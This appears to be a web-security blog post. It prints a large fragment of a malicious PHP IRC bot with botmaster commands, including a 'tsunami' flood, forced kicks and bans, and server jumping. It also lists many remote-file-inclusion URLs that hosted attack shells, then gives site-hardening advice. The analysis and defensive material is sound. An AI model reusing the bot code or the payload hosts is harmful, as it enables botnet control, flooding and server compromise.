                                                 elseif ($com[3]==':`notice' && $com[4] && $com[5]) {

                                                         $msg = strstr($data,":`notice");

                                                         $msg = str_replace(":`notice $com[4] ","",$msg);

                                                         fputs($fp,'NOTICE '.$com[4].' :'.$msg. CRL);

                                                 }

                                                 elseif ($com[3]==':`ctcp' && $com[4] && $com[5]) {

                                                         $msg = strstr($data,":`ctcp");

                                                         $msg = str_replace(":`ctcp $com[4] ","",$msg);

                                                         fputs($fp,'PRIVMSG '.$com[4].' :'.$msg.''. CRL);

                                                 }

                                                 elseif ($com[3]==':`ping' && $chan) {

                                                         $sml = $smile[rand(0,count($smile) - 1)];

                                                         fputs($fp,'PRIVMSG '.$chan.' :'.$dNick.', _PONG!_ '.$sml. CRL);

                                                 }

                                                 elseif ($com[3]==':`pong' && $chan) {

                                                         $sml = $smile[rand(0,count($smile) - 1)];

                                                         fputs($fp,'PRIVMSG '.$chan.' :'.$dNick.', _PING!_ '.$sml. CRL);

                                                 }

                                                 elseif ($com[3]==':`info' && $auth["$dNick"]["status"]=="Admin") {

                                                         $bhost = $SERVER['HTTPHOST'];

                                                         $bphp  = $SERVER['PHPSELF'];

                                                         fputs($fp,'NOTICE '.$dNick.' :Bot Host: '.$bhost.', Bot PHP: '.$bphp. CRL);

                                                 }

                                                 elseif ($com[3]==':`up' && $chan) {

                                                         fputs($fp, 'PRIVMSG chanserv@services.dal.net  p '.$chan.' '.$nick . CRL);

                                                 }

                                                 elseif ($com[3]==':`down' && $chan) {

                                                         fputs($fp, 'MODE '.$chan.' +v-o '.$nick.' '.$nick . CRL);

                                                 }

                                                 elseif ($com[3]==':`tsunami' && $com[4] && $auth["$dNick"]["status"]!="user") {

                                                         $nicktsu = $tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)];

                                                         fputs($fp, 'NICK '.$nicktsu . CRL);

                                                         if (substr($dCommand,0,3)=='433') {

                                                                 $nicktsu = $tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)];

                                                                 fputs($fp, 'NICK '.$nicktsu . CRL);

                                                         }

                                                         $msg = strstr($data,":`tsunami");

                                                         $msg = str_replace(":`tsunami $com[4]","",$msg);

                                                         if (ereg("#", $com[4])) {

                                                           fputs($fp, 'JOIN '.$com[4] . CRL);

                                                         }

                                                         fputs($fp, 'PRIVMSG '.$com[4].' :'.$msg.'__________________________________________________________________________________________________________________________________________________________________________________________________________________________________' . CRL);

                                                         fputs($fp, 'NOTICE '.$com[4].' :'.$msg.'___________________________________________________________________________________________________________________________________________________________________________________________________________________________________' . CRL);

                                                         fputs($fp, 'PRIVMSG '.$com[4].' :TSUNAMI '.$msg.'____________________________________________________________________________________________________________________________________________________________________________________________________________________________________' . CRL);

                                                         fputs($fp, 'PRIVMSG '.$com[4].' :'.$msg.'__________________________________________________________________________________________________________________________________________________________________________________________________________________________________' . CRL);

                                                         fputs($fp, 'NOTICE '.$com[4].' :'.$msg.'___________________________________________________________________________________________________________________________________________________________________________________________________________________________________' . CRL);

                                                         fputs($fp, 'PRIVMSG '.$com[4].' :FLOOD '.$msg.'____________________________________________________________________________________________________________________________________________________________________________________________________________________________________' . CRL);

                                                         if (ereg("", $com[4])) {

                                                           fputs($fp, 'PART '.$com[4].' :Complete' . CRL);

                                                           fputs($fp, 'NICK '.$nick . CRL);

                                                         } else {

                                                         fputs($fp, 'NICK '.$nick . CRL);

                                                         }

                                                 }

                                                 elseif ($com[3]==':`cycle' && $chan && $auth["$dNick"]["status"]!="user") {

                                                         $msg = strstr($data,":`cycle");

                                                         if (ereg("", $com[4])) {

                                                           $partchan = $com[4];

                                                           $msg = str_replace(":`cycle $com[4]","",$msg);

                                                         } else {

                                                           $partchan = $chan;

                                                           $msg = str_replace(":`cycle","",$msg);

                                                         }

                                                         if (strlen($msg)<3) {

                                                           $msg = '';

                                                         }

                                                         fputs($fp, 'PART '.$partchan.' :'.$msg . CRL);

                                                         fputs($fp, 'JOIN '.$partchan . CRL);

                                                 }

                                                 elseif ($com[3]==':`part' && $auth["$dNick"]["status"]=="Admin") {

                                                         $msg = strstr($data,":`part");

                                                         if (ereg("#", $com[4])) {

                                                           $partchan = $com[4];

                                                           $msg = strreplace(":`part $com[4]","",$msg);

                                                         } else {

                                                           $partchan = $chan;

                                                           $msg = str_replace(":`part","",$msg);

                                                         }

                                                         if (strlen($msg)<3) {

                                                           $msg = '';

                                                         }

                                                         fputs($fp, 'PART '.$partchan.' :'.$msg . CRL);

                                                         $remchan = strtolower($partchan);

                                                         if (inarray($remchan, $channel)) {

                                                                 $channels = str_replace("$remchan ","",$channels);

                                                                 unset($channel);

                                                                 $channel = explode(" ", $channels);

                                                         }

                                                         foreach ($channel as $v) {

                                                                 fputs($fp, 'JOIN '.$v . CRL);

                                                         }

                                                 }

                                                 elseif ($com[3]==':`join' && $com[4] && $auth["$dNick"]["status"]=="Admin") {

                                                         if (!ereg("",$com[4])) { $com[4]="".$com[4]; }

                                                         $addchan = strtolower($com[4]);

                                                         if (!in_array($addchan, $channel)) {

                                                                 $channel[]=$addchan;

                                                                 $channels.="$addchan ";

                                                         }

                                                         foreach ($channel as $v) {

                                                                 sleep(rand(1,6));

                                                                 fputs($fp, 'JOIN '.$v . CRL);

                                                         }

                                                 }

                                                 elseif ($com[3]==':`botnick' && $com[4] && !$chan && $auth["$dNick"]["status"]=="Admin") {

                                                         $nick = $com[4];

                                                         $identify = $com[5];

                                                         fputs($fp, 'NICK '.$nick . CRL);

                                                         fputs($fp, 'PRIVMSG nickserv@services.dal.net :identify '.$nick.' '.$identify.  CRL);

                                                 }

                                                 elseif ($com[3]==':`k' && $com[4] && $chan) {

                                                         $msg = strstr($data,":`k");

                                                         $msg = str_replace(":`k $com[4]","",$msg);

                                                         fputs($fp, 'KICK '.$chan.' '.$com[4].' :'.$msg . CRL);

                                                 }

                                                 elseif ($com[3]==':`kb' && $com[4] && $chan) {

                                                         $msg = strstr($data,":`kb");

                                                         $msg = str_replace(":`kb $com[4]","",$msg);

                                                         fputs($fp, 'KICK '.$chan.' '.$com[4].' :'.$msg . CRL);

                                                         fputs($fp, 'MODE '.$chan.' +b '.$com[4] . CRL);

                                                 }

                                                 elseif ($com[3]==':`ganti') {

                                                         $nick = $nicky[rand(0,count($nicky) - 1)];

                                                         fputs($fp, 'NICK '.$nick . CRL);

                                                         if (substr($dCommand,0,3)=='433') {

                                                                 $nick = $nicky[rand(0,count($nicky) - 1)];

                                                                 fputs($fp, 'NICK '.$nick . CRL);

                                                         }

                                                 }

                                                 elseif ($com[3]==':`op' && $chan) {

                                                         if ($com[4]) { $opnick = $com[4]; }

                                                         else { $opnick = $dNick; }

                                                         fputs($fp, 'MODE '.$chan.' +ooo '.$opnick.' '.$com[5].' '.$com[6] . CRL);

                                                 }

                                                 elseif ($com[3]==':`deop' && $chan) {

                                                         if ($com[4]) { $opnick = $com[4]; }

                                                         else { $opnick = $dNick; }

                                                         fputs($fp, 'MODE '.$chan.' -o+v-oo '.$opnick.' '.$opnick.' '.$com[5].' '.$com[6] . CRL);

                                                 }

                                                 elseif ($com[3]==':`v' && $chan) {

                                                         if ($com[4]) { $vonick = $com[4]; }

                                                         else { $vonick = $dNick; }

                                                         fputs($fp, 'MODE '.$chan.' +vvv '.$vonick.' '.$com[5].' '.$com[6] . CRL);

                                                 }

                                                 elseif ($com[3]==':`dv' && $chan) {

                                                         if ($com[4]) { $vonick = $com[4]; }

                                                         else { $vonick = $dNick; }

                                                         fputs($fp, 'MODE '.$chan.' -vvv '.$vonick.' '.$com[5].' '.$com[6] . CRL);

                                                 }

                                                 elseif ($com[3]==':`awaymsg' && $auth["$dNick"]["status"]=="Admin") {

                                                         $msg = strstr($data,":`awaymsg");

                                                         $msg = str_replace(":`awaymsg","",$msg);

                                                         if (strlen($msg)<3) {

                                                           $raway="on";

                                                           fputs($fp,'AWAY : ' . 'AWAY' . CRL);

                                                         } else {

                                                           $raway="off";

                                                           fputs($fp,'AWAY : ' . $msg . CRL);

                                                         }

                                                 }

                                                 elseif ($com[3]==':`mode' && $com[4] && $chan) {

                                                         fputs($fp, 'MODE '.$chan.' :'.$com[4].' '.$com[5] . CRL);

                                                 }

                                                 elseif ($com[3]==':`nickmode' && $com[4]) {

                                                         $nickmode = $com[4];

                                                         fputs($fp, 'MODE '.$nick.' :'.$nickmode . CRL);

                                                 }

                                                 elseif ($com[3]==':`chanlist') {

                                                         fputs($fp, 'NOTICE '.$dNick.' :Channel List: '.$channels . CRL);

                                                 }

                                                 elseif ($com[3]==':`userlist') {

                                                         $userlist="";

                                                         foreach ($auth as $user) {

                                                           if ($user["pass"]) { $pass="-pass ok"; }

                                                           else { $pass="-no pass"; }

                                                           $userlist .= $user["name"].'('.$user["status"].$pass.') ';

                                                         }

                                                         fputs($fp, 'NOTICE '.$dNick.' :User List: '.$userlist . CRL);

                                                 }

                                                 elseif ($com[3]==':`quit' && $auth["$dNick"]["status"]=="Admin") {

                                                         $msg = strstr($data,":`quit");

                                                         $msg = str_replace(":`quit","",$msg);

                                                         if (strlen($msg)>3) {

                                                           $msg = str_replace(" ","",$msg);

                                                         }

                                                         $quit1 = array("ngantor","nguantuk","sama","brb","byeall","s33_you","excess_flood","pingtimeout","hehe","bye","mandi","makan","muuah","quit","conection_reset_bay_peer","banned","part","leaving","ada_deh","call_me","wew","toronto.hub.dal.net_brodway.dal.net","no_komen","restart");

                                                         $quitmsg = $quit1[rand(0,count($quit1) - 1)];

                                                         fputs($fp, 'QUIT ' . $quitmsg . CRL);

                                                         $keluar = 1;

                                                         exit;

                                                 }

                                                 elseif ($com[3]==':`vhost' && $auth["$dNick"]["status"]=="Admin") {

                                                         if ($com[4]) { $localhost = $com[4]; }

                                                         else { $localhost = 'localhost'; }

                                                         $keluar = 0;

                                                         fputs($fp, 'QUIT ' . CRL);

                                                 }

                                                 elseif ($com[3]==':`jump' && $auth["$dNick"]["status"]=="Admin") {

                                                         if (!eregi(".dal.net",$com[4])) {

                                                           $remotehost = "irc.dal.net";

                                                         } else { $remotehost = $com[4]; }

                                                         $keluar = 0;

                                                         fputs($fp, 'QUIT changging_server' . CRL);

                                                 }

                                                 elseif ($com[3]==':`ident' && $auth["$dNick"]["status"]=="Admin") {

                                                         if (!$com[4]) {

                                                           $username = $username;

                                                         } else { $username = $com[4]; }

                                                         $keluar = 0;

                                                         fputs($fp, 'QUIT ganti_ident' . CRL);

                                                 }

                                                 elseif ($com[3]==':`fullname' && $auth["$dNick"]["status"]=="Admin") {

                                                         if (!$com[4]) {

                                                           $realname = "--";

                                                         } else { $realname = $com[4]; }

                                                         $keluar = 0;

                                                         fputs($fp, 'QUIT ganti_fullname' . CRL);

                                                 }

                                                 elseif ($com[3]==':`topic' && $com[4] && $chan) {

                                                         $msg = strstr($data,":`topic");

                                                         $msg = str_replace(":`topic ","",$msg);

                                                         fputs($fp, 'TOPIC '.$chan.' :'.$msg . CRL);

                                                 }

                                                 elseif ($com[3]==':!help' && !$chan) {

                                                         fputs($fp,'PRIVMSG '.$dNick.' :Secret Help' . CRL);

                                                 }

                                         } else { fputs($fp,'NOTICE '.$dNick.'  lease Auth First! Type: auth <your pass> To Authorized '. CRL); }

                                 }

                                 }

                                 elseif (!$auth["$dNick"] && !eregi("auth",$iText)) {

                                         if (eregi("www.",$iText) || eregi("http:",$iText) || eregi("join ",$iText)) {

                                                 if (!ereg("",$dCommand)) {

                                                         if ($log=="on") {

                                                                 fputs($fp,'PRIVMSG '. $Admin .' :4inviter: ' . $dFrom . '2:' .$iText. CRL);

                                                         }

                                                         $inv = strstr($dFrom,'@');

                                                         foreach ($auth as $user) {

                                                                 if ($user["status"]=="user") {

                                                                         fputs($fp, 'NOTICE '.$user["name"].' :KB '.$chan.' '.$dNick.' '.$inv.'' . CRL);

                                                                 }

                                                         }

                                                 }

                                         }

                                         elseif (!ereg("#",$dCommand)) {

                                                 if ($log=="on") {

                                                         fputs($fp,'PRIVMSG '.$Admin.' :6' . $dFrom . '12:' .$iText. CRL);

                                                 }

                                         }

                                 }

                                 }

                         }

                         elseif (substr($data,0,4) == 'PING') {

                                 fputs($fp,'PONG ' . substr($data,5) . CRL);

                                         $smile = $querym[rand(0,count($querym) - 1)];

                                         $kata1 = $usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)];

                                         $kata2 = $usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)];

                                         fputs($fp,'PRIVMSG #whatz :' . $kata1 . ' ' . $kata2 . $smile . CRL);

                         }

                 }

         }

         fclose ($fp);

} while ($keluar==0);

}

working($nick);

?>

Yes, that’s right Nancy, it’s an IRC bot coded in PHP!  Quite nice.  It appears to give a conduit to a bot master, probably used to upload and execute new scripts.  Fortunately, most sites aren’t vulnerable to this relatively old attack.  It is interesting, though, that the attacks are clearly aimed at certain types of software that are apparently perceived as vulnerable by the miscreant that is spreading this gunk.

http://www.mta.cl/galeria2/galery2.jpg??
http://www.mta.cl/galeria2/galery.txt?
http://www.freewebtown.com/w8ting/safe.txt??
http://tools.aerofito.com/safeon.txt??
http://64.203.191.222/.check/c.txt?
http://www.ohanlonpaving.com/phpmic.txt.txt?
http://rotation.wooshck.org/image/safe.txt?
http://83.19.144.26/bo.do??
http://www.old2sold.net/newpitbulonspread.txt?
http://coolpc.com.tw/evaluate/safe?
http://www.ena-gmbh.de/download/cikos.txt?
http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????????
http://www.freewebtown.com/komandan/tool/q3.txt?
http://www.manycontentz.com//ine/img/contr.txt??
http://ninaru.hut2.ru/images/cs.txt?
http://amygirl.land.ru/baby?
http://electro.lydo.org/rfi/id.txt?
http://freewebs.com/chika_manis_banget/cmd.txt???
http://www.martinschaab.de/php/id.txt?
http://www.realtyna.com/about.gif??
http://zamkad.ru/pub/buffer_upload/…/cmd.txt?
http://www.realtyna.com/safe.txt??
http://www.cluelesstravel.com/guestheath/id.txt??
http://bondick.net/flashchat/nick_image/htaccess?
http://kiopmanminsuion.chat.ru/http?
http://phila.wonbuddhism.info/bbs//skin/zero_vote/images/btn_black.gif?
http://193.109.188.20/0/templates/rhuk_solarflare_ii/css/contr.txt??
http://www.martinschaab.de/php/phpSecurePages//phpSecurePages/u.txt?

What was really interesting to me in my google search for some of the inclusion URLs is the number of log files that are available and indexed via google.  For a long time, I have gotten many hits with the referral set to a spammy site - an obvious attempt to get some clicks and link mojo with Google.   I never really thought a lot about it, but I can see that it’s probably a fairly effective thing, given the number of log files I found via google.

The current list of php inclusion hits for my sites is below:

http://www.s1ko.jazztel.es/safe.gif?
http://gw-gold.net/dragoc/id.txt?
http://musicgirll.chat.ru/wav/mysong?
http://www.mta.cl/galeria2/galery.txt?
http://www.mta.cl/galeria2/galery.jpg?
http://www.madinaedu.gov.sa/safeon.txt??
http://www.modelismo.alternativo.nom.br//poll/polldata/readme.txt??
http://shellbr.com.sapo.pt/safeon.txt??
http://zamkad.ru/pub/buffer_upload/…/cmd.txt?
http://www.volontaridelrotary2040.com/html/modules/xt_conteudo/NewFile.txt?
http://telkomsex.com/ec.txt?
http://193.109.188.20/0/templates/rhuk_solarflare_ii/css/contr.txt??
http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????????
http://neu.sv-badbentheim.de/hide.txt?
http://www.smartlabphd.com/book/list/skin/zero_vote/images/setup_pages2.gif???
http://www.smartlabphd.com/book/list/skin/zero_vote/images/setup_pages.gif???
http://www.urjb.com/photos/albums/userpics/10001/thumb_blank.gif??
http://www.hgbruce.com/components/com_rsgallery/safeon.txt??
http://tr-igus.com/safe.txt?
http://www.valerieataylor.com/gb/book2.gif??
http://servergazi.com/portal/images/stories/web.gif??
http://hackbsd.net/.xrt/safe.gif?
http://www.freewebtown.com/w8ting/safe.txt??
http://rumusic.chat.ru/rumusic.wav?
http://ninaru.hut2.ru/images/cs.txt?
http://amygirl.land.ru/baby?
http://www.martinschaab.de/php/id.txt?
http://x0.741.com/pb.txt?
http://location-investment.com/Connections/r8.txt?
http://jjisdfiuw834wsdd.chat.ru/js?

I’ve started downloading the files and looking at them.  Many of them are loosly copied off of one another, some are exactly the same.  Some are quite complex, all-in-one shells, that would allow complete server control.  Most of them appear to give some basic information, like directory, available disk space, effetive UID and GID, and the like.

Background

The “cost of entry” to run a website is very low now, and we have seen an explosion of small sites on the Internet. Supporting this trend has been the availability of free and open source applications that allow site owners to do nearly anything they want, from blogs to wikis to forums. 

Unfortunately, nearly all of the software has inherent bugs that can be exploited by bad people. The exploitation of such bugs has matured in a similar fashion to the applications themselves.  Compromised web sites are a foundation to many threats currently on the Internet. Site owners are unknowingly supporting illegal activities such as:

• Hosting warez
• Hosting copyrighted files
• Hosting tools to compromise other sites
• Sending massive amounts of spam
• Host phishing sites to steal money
• Become part of command and control for botnets

Running a web site properly is truly becoming a social responsibility. If you are not part of the solution, you are likely part of the problem. 

This guide outlines some general and basic security measures that you MUST take if you want to make sure your site is not defaced or otherwise compromised.

Key elements needed in a web hosting platform

Try as you might, if another site on the server you share does not follow prudent security measures, then your site it still vulnerable. Suphp executes php scripts as the user-id and group-id of the account – not the userid/group id of the web server.

This will allow more restrictive permissions on your directories and will prevent an attacked from being able to read your php files.

Some hosts will not want to use suphp, as it can cause performance problems.

Build a relationship with provider on dealing with security issues

Firewall outbound connections

 This is not always practical or possible, but firewalling traffic originating from the server – other than what is expected – can prevent backdoor tools from phoning home.

Run suhosin patch for php

Suhosin can stop the exploitation of many different types of coding weaknesses and some vulnerabilities in php itself.

Keeping up with the web software you use

• Subscribe to mailing list for any application software used as part of your site.  Nearly all such applications have an “announcement” list that is low traffic.
• Attempt to participate regularly in the forums or discussion lists for the software you use. You will often get advanced warning of security issues and interim fixes.  You will also know if the software is at risk of being abandoned and not updated.
• Upgrade after a security fix release within 3 days.  Vulnerabilities are often exploited soon after they are discovered.
• If an application you use becomes abandon, plan to migrate your site to a new tool as fast as possible.
• Try not to customize software.  This will slow down your ability to patch or upgrade, because you’ll have to rewrite code, test, etc, and that can be difficult to do when it’s not on your timeline.
• Attempt to remove ‘powered by’ and version number references.  Nearly all open source web applications proudly, but this has turned out to be an extrodinarily efficient way to systematically identify sites running vulnerable software. 
  
• Create a file with a random name in your html directory. Do not reference the file in your site. Grep your web logs daily for the file being accessed. Any hits may indicate that your site has been compromised.
  
• Scan for file differences and notify of differences
  

Your responsibilities as a site owner

• Perform frequent off-site backups.  Even if you have a local backup strategy, such as to another server, it is imperative to maintain an offsite backup.  While it doesn’t happen often, datacenters are broken into and servers are phyically stolen.
• Do not store sensitive data like credit card numbers.  Just don’t do it.
• Change account passwords regularly